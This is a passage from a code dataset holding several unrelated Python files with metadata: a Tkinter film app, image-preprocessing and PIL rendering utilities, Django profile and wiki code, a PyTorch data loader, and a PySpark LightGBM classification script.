Image.open(name + \".jpg\")\n image1 = image1.resize((180, 240), Image.ANTIALIAS)\n test = ImageTk.PhotoImage(image1)\n label1 = Label(display, image=test, width=180, height=240)\n label1.image = test\n label1.place(x=x+10, y=y)\n\n films = filmlist\n for film in films:\n id = film[0]\n name = film[1]\n descr = film[2]\n rating = film[3]\n genre_id = film[4]\n photo = film[5]\n genre_title = film[6]\n show_film(baseX, baseY, id, name, descr, rating, genre_id, photo, genre_title)\n baseY+=300\n\ndef exact_film(window, id):\n\n def back():\n display.destroy()\n\n def open_genre_page():\n genre_window(window, genresTable)\n\n def show_comment(x,y,comment_id, user_id, film_id, content, date, username):\n usernamelbl = Label(display, text=username, font=(\"Gotham\", \"12\"))\n usernamelbl.place(x=x + 230, y=y + 200)\n\n contentlbl = Label(display, text=content, font=(\"Gotham\", \"12\"))\n contentlbl.place(x=x + 230, y=y + 240)\n\n datelbl = Label(display, text=date, font=(\"Gotham\", \"12\"))\n 
datelbl.place(x=x + 900, y=y + 200)\n\n def create_comment():\n content = entComment.get()\n f = open(\"localstorage.json\", \"r\")\n row = f.read()\n data = json.loads(row)\n\n today = date_module.today()\n now = datetime.now().time() # time object\n d1 = today.strftime(\"%d/%m/%Y\")\n d1 = str(d1)\n now = str(now)\n\n commentTable.create_comment(data[\"user_id\"], id, content, d1+\" \"+now )\n\n\n display = Frame(window, height = 700, width=1300, bg=\"GREEN\")\n display.place(x=0, y=0)\n baseX = 100\n baseY = 100\n\n back = Button(display, text=\"back\", font=(\"Gotham\", \"15\"), command=back)\n back.place(x=20, y=10)\n\n genres = Button(display, text=\"genres\", font=(\"Gotham\", \"15\"), command=open_genre_page)\n genres.place(x=100, y=10)\n\n film = films.get_exact_film(id)\n name = film[1]\n descr = film[2]\n rating = film[3]\n genre_id = film[4]\n photo = film[5]\n genre_title = film[6]\n\n namelbl = Label(display, text=name, font=(\"Gotham\", \"12\"))\n namelbl.place(x=330, y=110)\n\n descrlbl = Label(display, text=descr, font=(\"Gotham\", \"12\"))\n descrlbl.place(x=330, y=160)\n\n ratinglbl = Label(display, text=rating, font=(\"Gotham\", \"12\"))\n ratinglbl.place(x=800, y=110)\n\n genrelbl = Label(display, text=genre_title, font=(\"Gotham\", \"12\"))\n genrelbl.place(x=1000, y=110)\n\n write_file(photo, name + \".jpg\")\n image1 = Image.open(name + \".jpg\")\n image1 = image1.resize((180, 240), Image.ANTIALIAS)\n test = ImageTk.PhotoImage(image1)\n label1 = Label(display, image=test, width=180, height=240)\n label1.image = test\n label1.place(x=110, y=100)\n\n\n entComment = Entry(display, font=(\"Gotham\", \"12\"), width=50)\n entComment.place(x=330, y=200)\n\n btnCreate = Button(display, text=\"Create\", font=(\"Gotham\", \"12\"), command=create_comment)\n btnCreate.place(x=800, y=200)\n\n comments = commentTable.get_film_comment(id)\n for comment in comments:\n comment_id = comment[0]\n user_id = comment[1]\n film_id = comment[2]\n content = comment[3]\n date = comment[4]\n username = comment[5]\n show_comment(baseX, baseY, comment_id, user_id, film_id, content, date, username)\n baseY=baseY+80\n\n", "sub_path": "project/tkinterFilms.py", "file_name": "tkinterFilms.py", "file_ext": "py", "file_size_in_byte": 9286, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "db_init.genresTable", "line_number": 14, "usage_type": "argument"}, {"api_name": "tkinterCreate.create_genre_page", "line_number": 24, "usage_type": "call"}, {"api_name": "tkinterCreate.create_film_page", "line_number": 27, "usage_type": "call"}, {"api_name": "db_init.write_file", "line_number": 72, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 73, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 74, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 74, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 75, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 75, "usage_type": "name"}, {"api_name": "db_init.films", "line_number": 80, "usage_type": "name"}, {"api_name": "db_init.films", "line_number": 81, "usage_type": "name"}, {"api_name": "db_init.films.get_films_by_genre", "line_number": 109, "usage_type": "call"}, {"api_name": "db_init.films", "line_number": 109, "usage_type": "name"}, {"api_name": "db_init.genresTable", "line_number": 141, "usage_type": "argument"}, 
{"api_name": "db_init.films.get_films_by_genre", "line_number": 146, "usage_type": "call"}, {"api_name": "db_init.films", "line_number": 146, "usage_type": "name"}, {"api_name": "db_init.films.get_films_by_genre", "line_number": 151, "usage_type": "call"}, {"api_name": "db_init.films", "line_number": 151, "usage_type": "name"}, {"api_name": "db_init.write_file", "line_number": 185, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 186, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 186, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 187, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 187, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 188, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 188, "usage_type": "name"}, {"api_name": "db_init.films", "line_number": 193, "usage_type": "name"}, {"api_name": "db_init.films", "line_number": 194, "usage_type": "name"}, {"api_name": "db_init.genresTable", "line_number": 211, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 227, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 229, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 229, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 230, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 230, "usage_type": "name"}, {"api_name": "db_init.commentTable.create_comment", "line_number": 235, "usage_type": "call"}, {"api_name": "db_init.commentTable", "line_number": 235, "usage_type": "name"}, {"api_name": "db_init.films.get_exact_film", "line_number": 249, "usage_type": "call"}, {"api_name": "db_init.films", "line_number": 249, "usage_type": "name"}, {"api_name": "db_init.write_file", "line_number": 269, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 270, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 270, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 271, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 271, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 272, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 272, "usage_type": "name"}, {"api_name": "db_init.commentTable.get_film_comment", "line_number": 284, "usage_type": "call"}, {"api_name": "db_init.commentTable", "line_number": 284, "usage_type": "name"}]} +{"seq_id": "187658095", "text": "from skimage import io\nimport numpy as np\nimport cv2\nimport os, sys\nfrom PIL import Image\nimport shutil\n\ninput_path = r\"D:\\WorkSpace\\Pix2Pix\\data\\test\\original\"\noutput_path = r\"D:\\WorkSpace\\Pix2Pix\\data\\test\\test\"\n\nimages = [os.path.join(input_path, img) for img in os.listdir(input_path)]\ntarget_width = target_height = 600\n\ndef inference_image_builder(image, output_path, target_width=600, target_height=600):\n print(f\"Processing {image} >>>\")\n output_img = os.path.join(output_path, image.split('\\\\')[-1])\n image = Image.open(image)\n image = image.resize((target_height, target_width))\n target_image = Image.open(\"inf_zero.png\")\n images = [image, target_image]\n\n new_image = Image.new('RGB', (2*target_height, target_width))\n x_offset = 0\n for im in images:\n new_image.paste(im, (x_offset, 0))\n x_offset+= im.size[0]\n new_image.save(output_img)\n\nfor i in images:\n inference_image_builder(i, output_path)", "sub_path": "GAN/GAN_inference_data_builder.py", 
"file_name": "GAN_inference_data_builder.py", "file_ext": "py", "file_size_in_byte": 953, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 17, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 19, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 19, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "297591044", "text": "import os\nfrom string import whitespace as whitespace_\n\nfrom PIL import Image as Image_, ImageDraw, ImageFont\n\nwhitespace = whitespace_.replace(' ', '')\n\n\nclass Text(object):\n def __init__(self, text=None, center=False, font=None, spacing=1.0):\n self.font = self.size = None\n self.spacing = spacing\n self.is_center = center\n self.text = '' if (text is None) else text\n if font is not None:\n self.set_font(font)\n\n def right_strip(self, line):\n if line != '':\n while line[-1:] == ' ':\n line = line[:-1]\n return line\n\n def left_strip(self, line):\n if line != '':\n while line[0] == ' ':\n line = line[1:]\n return line\n\n def set_font(self, font_path):\n assert os.path.exists(font_path) and os.path.isfile(font_path)\n self.font = font_path\n\n def section(self, line, index):\n line1 = line[:index]\n line2 = line[index:]\n el = line1[-1:]\n s_el = '' if line2 == '' else line2[0]\n if el != ' ' and s_el != ' ':\n i = line1.rfind(' ')\n if i >= 0:\n line2 = line1[i:] + line2\n line1 = line1[:i]\n line1 = self.right_strip(line1)\n line2 = self.left_strip(line2)\n return (line1, line2)\n\n def echo(self, image, draw, position, left, right):\n x, before_y = position\n y = before_y\n\n size = 13 if self.size is None else self.size\n font = ImageFont.truetype(self.font, size) if self.font is not None \\\n else ImageFont.load_default()\n\n max_width = right - left\n lines = self.text.split('\\n')\n lines.reverse()\n while len(lines) > 0:\n line = lines.pop()\n width, height = font.getsize(line)\n if width > max_width:\n section = int(len(line) * (max_width * 1.0 / width + 0.05))\n # +5% на всякий случай - в случае наличия спец. 
символов,\n # которые не будут отображаться\n while True:\n (line1, line2) = self.section(line, section)\n width_1, height = font.getsize(line1)\n if width_1 <= max_width:\n width = width_1\n break\n sec = line1.rfind(' ')\n if sec < 0:\n sec = section - 1\n section = sec\n\n line = line1\n lines.append(line2)\n\n x1 = x if not self.is_center else x + int((max_width - width) / 2)\n draw.text((x1, y), line, fill='black', font=font)\n y += int(self.spacing * height)\n return y - before_y\n\n def draw(self, draw, x, y, text, font):\n xy = (x, y)\n draw.text(xy, text, fill='black', font=font)\n\n\nclass Image(object):\n def __init__(self, path=None, fixed=True):\n if path is not None:\n self.set_path(path)\n self.fixed = fixed\n\n def set_path(self, path):\n assert os.path.exists(path) and os.path.isfile(path)\n self.path = path\n\n def draw(self, left, right):\n img = Image_.open(self.path, 'r')\n if not self.fixed:\n old_width, old_height = img.size\n width = right - left\n height = int(old_height * width / old_width)\n img = img.resize((width, height), Image_.BICUBIC)\n return img\n\n def echo(self, image, draw, position, left, right):\n x, y = position\n img = self.draw(left, right)\n image.paste(img, (x, y), img)\n w, h = img.size\n return h\n\n\nclass TableColumn(object):\n def __init__(self, per_sent=None):\n self.persent = per_sent\n self.rows = []\n self.reset()\n\n def __getitem__(self, index):\n return self.rows[index]\n\n def __setitem__(self, key, value):\n assert isinstance(value, Image) or isinstance(value, Text) \\\n or isinstance(value, Table)\n self.rows[key] = value\n\n def __iter__(self):\n return iter(self.rows)\n\n def add_elems(self, val=1):\n while val > 0:\n self.rows.append(None)\n val -= 1\n\n def reset(self):\n self.index = 0\n\n def __next__(self):\n try:\n el = self[self.index]\n except IndexError:\n return None\n self.index += 1\n return el\n\n def is_full(self):\n return not len(self.rows) > self.index\n\n\nclass Table(object):\n def __init__(self, cols=None, rows=None):\n self.cols = []\n if cols is not None:\n self.add_col(cols)\n if rows is not None:\n self.add_row(rows)\n\n def add_row(self, val=None):\n for row in self.cols:\n row.add_elems(val)\n\n def add_col(self, val=None):\n v = val if val is not None else 1\n assert isinstance(v, int)\n while v > 0:\n v -= 1\n self.cols.append(TableColumn())\n\n def __setitem__(self, key, value):\n self.cols[key] = value\n\n def __getitem__(self, key):\n return self.cols[key]\n\n def check_persent(self):\n all_ = 0.0\n with_none = 0\n for col in self.cols:\n if col.persent is None:\n #all_ = -1\n #break\n with_none += 1\n else:\n all_ += col.persent\n if with_none > 0:\n abs_ = (100.0 - all_) / with_none\n for col in self.cols:\n if col.persent is None:\n col.persent = abs_\n return True\n elif all_ != 100.0:\n self.cols[len(self.cols) - 1].persent += 100.0 - all_\n return True\n return False\n\n #def draw(self, x, y, left, right):\n def echo(self, image, draw, position, left, right):\n self.check_persent()\n\n width = right - left\n x, table_y = position\n y = table_y\n for col in self.cols:\n col.reset()\n\n while not self.is_full_():\n h = 0\n l = r = left\n n_x = x\n for col in self.cols:\n r += int(col.persent * width / 100.0)\n el = next(col)\n if el is not None:\n pos = (n_x, y)\n new_h = el.echo(image, draw, pos, l, r)\n h = new_h if new_h > h else h\n n_x += r - l\n l = r\n y += h\n\n return table_y - y\n\n def is_full_(self):\n return (len(self.cols) == 0) or self.cols[0].is_full()\n\n\nclass 
Document(object):\n A4 = (2481, 3507)\n\n def __init__(self, background=None, padding_left=0, padding_right=0):\n self.background = background\n self.left = padding_left\n self.right = padding_right\n self.objs = []\n\n def add_object(self, position, obj):\n self.objs.append((position, obj))\n\n def draw(self, filename):\n frame = Image_.open(self.background) if self.background is not None \\\n else Image_.new('RGB', self.A4)\n draw = ImageDraw.Draw(frame)\n width, height = frame.size\n l = self.left\n r = width - self.right\n for pos, obj in self.objs:\n obj.echo(frame, draw, pos, l, r)\n # import ipdb; ipdb.set_trace()\n frame.save(filename, 'png')\n", "sub_path": "libs/create_docs/objectpng.py", "file_name": "objectpng.py", "file_ext": "py", "file_size_in_byte": 7430, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "string.whitespace.replace", "line_number": 6, "usage_type": "call"}, {"api_name": "string.whitespace", "line_number": 6, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 53, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 53, "usage_type": "name"}, {"api_name": "PIL.ImageFont.load_default", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 54, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 97, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 101, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 101, "usage_type": "name"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 106, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 106, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 244, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 244, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 245, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 245, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 246, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 246, "usage_type": "name"}]} +{"seq_id": "413255673", "text": "from PIL import Image\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.translation import gettext as _\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Profile(models.Model):\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE\n )\n image = models.ImageField(\n _('Profile Picture'),\n default='default.png',\n upload_to='profile_pics',\n help_text=_('Designates the users Profile picture.')\n )\n address_line1 = models.CharField(\n _('Address line 1'),\n max_length=100,\n help_text=_('Designates the users Address line1.')\n )\n address_line2 = models.CharField(\n _('Address line 2'),\n max_length=100,\n help_text=_('Designates the users Address line 2.')\n )\n pincode = models.CharField(\n _('Pincode'),\n max_length=6,\n help_text=_('Designates the users PINCODE.')\n )\n contactno = models.CharField(max_length=10,default=1234567890)\n\n def 
__str__(self):\n return f'{self.user.username}'\n def get_username(self):\n return self.user.username\n def get_email(self):\n return self.user.email\n def get_fullname(self):\n return self.user.get_full_name()\n\n def save(self,*args,**kwargs):\n super().save(*args,**kwargs)\n img=Image.open(self.image.path)\n if img.height>300 or img.width >300 :\n output_size=(300,300)\n img.thumbnail(output_size)\n img.save(self.image.path)\n\n# #Signals part can be used alternatively for signals.py\n# def create_profile(sender, instance, created, **kwargs):\n# if created:\n# Profile.objects.create(user=instance)\n# # print(\"Create_profile function executed!\")\n#\n# def save_profile(sender, instance, **kwargs):\n# instance.profile.save()\n# # print(\"Save_profile function executed!\")\n#\n# post_save.connect(create_profile,sender=User)\n# post_save.connect(save_profile,sender=User)\n", "sub_path": "users/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 2342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.db.models.Model", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 10, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 16, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 22, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 27, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 32, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "56712542", "text": "from configs import (train_path101, test_path101)\nfrom utils import get_data101 as get_data\nfrom PIL import Image\nfrom torch.utils.data import (Dataset, 
DataLoader)\nfrom dataloader import (rand_transform101, train_args, test_args)\nimport random\nimport torch\nimport numpy as np\n\nclass HotDogDataset(Dataset):\n \"\"\"Face Landmarks dataset.\"\"\"\n\n def __init__(self, datalist, transform=None):\n \"\"\"\n :param transform:TRANSFORMATION FOR DATA_AUGMENTATION\n \"\"\"\n self.datalist = datalist\n self.transform = transform\n\n def __len__(self):\n return len(self.datalist)\n\n def __getitem__(self, idx):\n path, label = self.datalist[idx]\n image = Image.open(path)\n while np.array(image).shape[-1] != 3:\n path, label = random.sample(self.datalist, 1)[0]\n image = Image.open(path)\n sample = {'image': image}\n if self.transform:\n sample['image'] = self.transform(sample['image'])\n sample.update({'label': torch.tensor(label)})\n return sample\n\n\nclass HotDogDataSetLoader(object):\n def __init__(self):\n self.train_list = get_data(train_path101)\n self.test_list = get_data(test_path101)\n self.transform = rand_transform101\n\n self.trainsets = HotDogDataset(self.train_list, transform=rand_transform101)\n self.testsets = HotDogDataset(self.test_list, transform=rand_transform101)\n\n def random(self):\n random.shuffle(self.train_list)\n random.shuffle(self.test_list)\n\n self.trainsets = HotDogDataset(self.train_list, transform=rand_transform101)\n self.testsets = HotDogDataset(self.test_list, transform=rand_transform101)\n\n def train_test(self):\n self.random()\n return DataLoader(self.trainsets, **train_args), DataLoader(self.testsets, **test_args)\n\n def train(self):\n self.random()\n return DataLoader(self.trainsets, **train_args)\n\n def test(self):\n self.random()\n return DataLoader(self.testsets, **test_args)", "sub_path": "assign3_convolution_nn/dataloader/food101smallloader.py", "file_name": "food101smallloader.py", "file_ext": "py", "file_size_in_byte": 2038, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 32, "usage_type": "call"}, {"api_name": "utils.get_data101", "line_number": 38, "usage_type": "call"}, {"api_name": "configs.train_path101", "line_number": 38, "usage_type": "argument"}, {"api_name": "utils.get_data101", "line_number": 39, "usage_type": "call"}, {"api_name": "configs.test_path101", "line_number": 39, "usage_type": "argument"}, {"api_name": "dataloader.rand_transform101", "line_number": 40, "usage_type": "name"}, {"api_name": "dataloader.rand_transform101", "line_number": 42, "usage_type": "name"}, {"api_name": "dataloader.rand_transform101", "line_number": 43, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 46, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 47, "usage_type": "call"}, {"api_name": "dataloader.rand_transform101", "line_number": 49, "usage_type": "name"}, {"api_name": "dataloader.rand_transform101", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 54, "usage_type": "call"}, {"api_name": 
"dataloader.train_args", "line_number": 54, "usage_type": "name"}, {"api_name": "dataloader.test_args", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 58, "usage_type": "call"}, {"api_name": "dataloader.train_args", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 62, "usage_type": "call"}, {"api_name": "dataloader.test_args", "line_number": 62, "usage_type": "name"}]} +{"seq_id": "22614457", "text": "#coding=utf-8\nfrom newtest.wiki.models import Wiki\nfrom django.template import loader, Context\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response\n\ndef index(request, pagename=\"\"):\n \"\"\"显示正常页面,对页面的文字做特殊的链接处理\"\"\"\n if pagename:\n #查找是否已经存在页面\n# pages = Wiki.objects.get_list(pagename__exact=pagename)\n pages = Wiki.objects.filter(pagename=pagename)\n if pages:\n #存在则调用页面模板进行显示\n return process('wiki/page.html', pages[0])\n else:\n #不存在则进入编辑画面\n return render_to_response('wiki/edit.html', {'pagename':pagename})\n \n else:\n# page = Wiki.objects.get_object(pagename__exact='FrontPage')\n page = Wiki.objects.get(pagename='FrontPage')\n return process('wiki/page.html', page)\n \ndef edit(request, pagename):\n \"\"\"显示编辑存在页面\"\"\"\n# page = Wiki.objects.get_object(pagename__exact=pagename)\n page = Wiki.objects.get(pagename=pagename)\n return render_to_response('wiki/edit.html', {'pagename':pagename, 'content':page.content})\n\ndef save(request, pagename):\n \"\"\"保存页面内容,老页面进行内容替换,新页面生成新记录\"\"\"\n content = request.POST['content']\n# pages = Wiki.objects.get_list(pagename__exact=pagename)\n pages = Wiki.objects.filter(pagename=pagename)\n if pages:\n pages[0].content = content\n pages[0].save()\n else:\n page = Wiki(pagename=pagename, content=content)\n page.save()\n return HttpResponseRedirect(\"/wiki/%s\" % pagename)\n\nimport re\n\nr = re.compile(r'\\b(([A-Z]+[a-z]+){2,})\\b')\ndef process(template, page):\n \"\"\"处理页面链接,并且将回车符转为
\"\"\"\n t = loader.get_template(template)\n content = r.sub(r'\\1', page.content)\n content = re.sub(r'[\\n\\r]+', '
', content)\n c = Context({'pagename':page.pagename, 'content':content})\n return HttpResponse(t.render(c))", "sub_path": "very_old_code/django_step_by_step/newtest/newtest/wiki/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2088, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "newtest.wiki.models.Wiki.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "newtest.wiki.models.Wiki", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 18, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects.get", "line_number": 22, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "newtest.wiki.models.Wiki", "line_number": 22, "usage_type": "name"}, {"api_name": "newtest.wiki.models.Wiki.objects.get", "line_number": 28, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "newtest.wiki.models.Wiki", "line_number": 28, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 29, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects.filter", "line_number": 35, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "newtest.wiki.models.Wiki", "line_number": 35, "usage_type": "name"}, {"api_name": "newtest.wiki.models.Wiki", "line_number": 40, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 42, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 46, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 49, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 49, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 51, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "218972778", "text": "from pyspark.sql import SparkSession\nfrom src.parser.csv_parser import load_as_df\nfrom src.schema.twitter_schema import twitter_schema\nfrom src.preprocess.preprocessor import shape_df\nfrom src.featurizer.word2vec_featurizer import Word2VecFeaturizer\nfrom src.utils.predager_config import predager_config\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\n\nif __name__ == '__main__':\n\n print('chinge')\n spark = SparkSession.builder.appName(\"MyApp\") \\\n .config(\"spark.jars.packages\", \"com.microsoft.ml.spark:mmlspark_2.11:1.0.0-rc3\") \\\n .config(\"spark.jars.repositories\", \"https://mmlspark.azureedge.net/maven\") \\\n .getOrCreate()\n print('hanage')\n from mmlspark.lightgbm import LightGBMClassifier\n print('munage')\n model = LightGBMClassifier(baggingSeed=1024,\n learningRate=0.01,\n numIterations=1000,\n maxBin=8,\n numLeaves=8,\n metric='auc')\n print('mimige')\n\n # Load training data\n # dataPath = '../../data/twitter/20190528sentences_data_integrated.csv'\n dataPath = predager_config.exp.lightGbm.dataPath\n df = load_as_df(dataPath, twitter_schema)\n converted_df = shape_df(spark, df).drop(\"age\")\n converted_df.show(3)\n # model_path = 
\"../../param/word2vec/entity_vector/entity_vector.model.bin\"\n # wv = Word2VecFeaturizer(spark, model_path)\n # feat_df = wv.featurize(converted_df)\n model_path = predager_config.exp.lightGbm.modelPath\n wv_tweet = Word2VecFeaturizer(spark, model_path, False)\n feat_df = wv_tweet.featurize(converted_df)\n # model_path = \"../../param/bert/Japanese_L-24_H-1024_A-16_E-30_BPE_WWM_transformers\"\n # bert = BertFeaturizer(spark, model_path)\n # Split the data into training and test sets (30% held out for testing)\n # multi_feat = MultiFeaturizer(spark, [wv, wv_tweet])\n # feat_df = multi_feat.featurize(converted_df)\n # converted_df2 = shape_df(spark, df, 'nagisa', ['補助記号']).drop(\"age\")\n # tfidf = TfidfFeaturizer(spark)\n # feat_df = tfidf.featurize(converted_df2)\n # onehot = OneHotFeaturizer(spark)\n # feat_df = onehot.featurize(converted_df)\n # multi_feat = MultiFeaturizer(spark, [wv_tweet, tfidf], [converted_df, converted_df2])\n # feat_df = multi_feat.featurize()\n (trainingData, testData) = feat_df.randomSplit([0.8, 0.2], seed=3)\n # 3. call `fit`. (fit のときにはたんに事前に作った data-frame を入れる)\n clf = model.fit(trainingData)\n\n predict_train = model.transform(trainingData)\n predict_test = model.transform(testData)\n\n # Select (prediction, true label) and compute test error\n evaluator = MulticlassClassificationEvaluator(\n labelCol=\"label\", predictionCol=\"prediction\", metricName=\"accuracy\")\n accuracy = evaluator.evaluate(predict_train)\n print(\"train accuracy: \" + str(accuracy))\n\n\n\n # Select (prediction, true label) and compute test error\n evaluator = MulticlassClassificationEvaluator(\n labelCol=\"label\", predictionCol=\"prediction\", metricName=\"accuracy\")\n accuracy = evaluator.evaluate(predict_test)\n print(\"test accuracy: \" + str(accuracy))", "sub_path": "src/models/classification/lightgbm_classifier.py", "file_name": "lightgbm_classifier.py", "file_ext": "py", "file_size_in_byte": 3246, "program_lang": "python", "lang": "en", "doc_type": "code", 